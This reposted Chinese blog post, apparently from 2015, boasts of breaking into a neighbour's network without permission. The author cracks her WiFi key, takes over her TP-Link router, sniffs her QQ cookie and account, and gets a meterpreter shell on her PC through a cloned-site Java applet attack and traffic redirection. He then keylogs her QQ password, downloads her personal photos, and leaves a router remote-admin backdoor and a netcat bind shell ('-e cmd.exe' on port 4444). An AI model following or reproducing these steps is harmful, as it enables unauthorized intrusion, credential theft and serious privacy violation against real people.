一次无意的无线攻击导致一枚可爱妹纸沦陷(电脑权限、QQ.wifi.mail密码、照片等)

今天发现一枚信号特别好的WIFI 再看看我2格信号的WiFi 表示十分不爽 但是手上字典确实只是纯数字的强大 数字字母组合的并不算强大 aircrack-ng的成功率或许只有五六十

用wpscan.py扫了下 发现他支持WPS 然后我用wpspy.py进行监测 为已配置 但是 困难多多 最后失败

于是乎 祭出神器aircrack-ng 监听、抓包、Deauth攻击、破解 我先用的一个80M的字母+数字的字典 人品爆发 破解成功 lyq19910502


http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182214_22326.png

然后电脑连上wifi 192.168.1.1 admin admin失败 admin lyq19910502成功 是一枚TPlink的路由器

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182215_26262.png

然后 手机也连上wifi 打开神器 输入路由器管理密码登陆上服务器 发现有好多连上的客户机 但我并没有直接先对其他的进行限速

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182215_26364.png

三星手机 安卓手机 YINGQI-PC是我自己的

我电脑开始使用wireshark进行抓包 手机搞开Dsploit劫持回话(由于airodump-ng抓包时候,我发现一台客户端与AP之间流量交互持续增加,加上PC-2010那个有流量,所以我断定有人此刻正在上网)

过了一会 暂停抓包 将wireshark的报文导出,导入cain解密,然后再倒回wireshark

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182215_86659.png

在筛选处 输入oicq 即为QQ 我在一个包内发现了oicp number 即QQ账号

别的包里还有一句UTF8格式的聊天记录 解开后发现无关紧要 这里不再提那些东西

然后我在一个包里 找到了她的cookie(wireshark就是牛逼)

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182216_53736.png

然后用QQskey突破工具登陆上了他的QQ空间 (毕竟邻居,具体内容不公开,断定是一个妹子,相册里也没照片,别处也没找到什么有价值的东西)

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182217_13067.png

在手机的Dsploit的劫持回话 我并没有劫持到有意义的东西

然后 我们进行真正技术含量的内网下社会工程学攻击

首先配置set_config 将它默认的MSF路径改对 然后目录下./set启动程序

可以看到 the social engineer至于这啥意思 懂的人都懂了

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182217_78779.png

依次选择 社会工程学攻击 网页攻击 JavaApplet 克隆站点

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182218_68103.png

 

然后 开始克隆 设置自己信息 然后要克隆的站点 www.qq.com

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182219_16767.png

当他把qq.com扒下来时候出现以下界面选2 当有windows访问我们本机的临时服务器 就会自动反弹一个msf的回话过来(通俗说 1.bt5给出一个地址 2.目标机访问改地址 3.直接上线) 这样十分的牛逼 根本无需生成木马 自动反弹shell 这也是我喜欢他的原因之一   他会自动给目标机下载木马并运行

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182219_16572.png

所以 我们为了避免杀毒软件 使用自带加壳工具进行加壳 选择16:Backdoored Executable 是Best 效果当然最好 这个过程也需要几分钟时间 出现下面界面 表示加壳成功

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182220_61410.png

然后他会自动启动msf的payload(载荷)和meterpreter进行各自的工作(他们具体干嘛的我在前面的MSF入侵windows(运用层离线攻击)那个文章说过了 这里不做过多熬述)

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182225_92966.png

下面我要说一下 我开始是这样想的 我们可以看出 访问192.168.159.128.8081即可反弹shell到msf上去

我想使用Ettercap进行DNS欺骗 欺骗过来 当我ettercap -G了之后突然有了灵感 使用MITM攻击(中间人攻击)进行重定向

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182228_32357.png

刚过了大约20秒 就有主机上线了

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182228_78963.png

看来 还是很好用的 sysinfo看了是一台xp(怪不得叫PC-2010xxxx 真是2010的-.-)

然后 我本地打开俺自己的免杀远控 Ghost3.6 生成木马

使用meterpreter的upload命令将木马上传上去 然后输入shell启动windows的CMD 将木马启动

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182228_72693.png

原来妹纸是掏粪的粉丝 我正好有这个站shell 脱下裤子查了查她用户名 MD5解不开 拉倒

说到了掏粪 就要把我那天自己P的一张图拿出来晒晒咯、哈哈~~

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182229_90933.gif

回到正题 既然她QQ登陆着 我们就可以种植一个QQkey过去 获取他的key 但是 我更喜欢QQ密码

于是乎 我结束了她QQ的进程 同时启动键盘记录

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182229_86442.png

不一会 密码到手咯~

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182230_17429.png

然后 我开始翻她电脑 猜猜我找到了什么~~

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182230_76066.png

照片我下载下来些 美的让我想撸啊!!  但是 黑亦有道 我就不发了

来看下这个老xp的系统信息 cmd的系统信息比msf的详细 所以上面我没有截图 这里再截图

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182230_36694.png

给她弹个窗 娱乐一下

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182230_29962.png

 

没啥可玩的了 该看的都看了 留个后门吧~

TPlink正好有一个远程管理 设置到我服务器上面去 随时随地 想连你wifi就连你WiFi 哼!

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182231_54156.png

然后给他的电脑留下后门  我用了及其迷你的神器 netcat 也就是我们说的:网络上的瑞士军刀 自己做了个免杀 然后放了上去

然后输命令-d -L -p 4444 -e cmd.exe  这个命令的意思就是 当我们使用nc在其他机器上连接这台机器的4444端口,就会将他的cmd给我

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182231_79966.png

测试一下是否成功

http://www.96sec.org/blog/zb_users/upload/2015/05/20150503182231_39934.png

 

 



转载自指尖上的故事博客


评论回复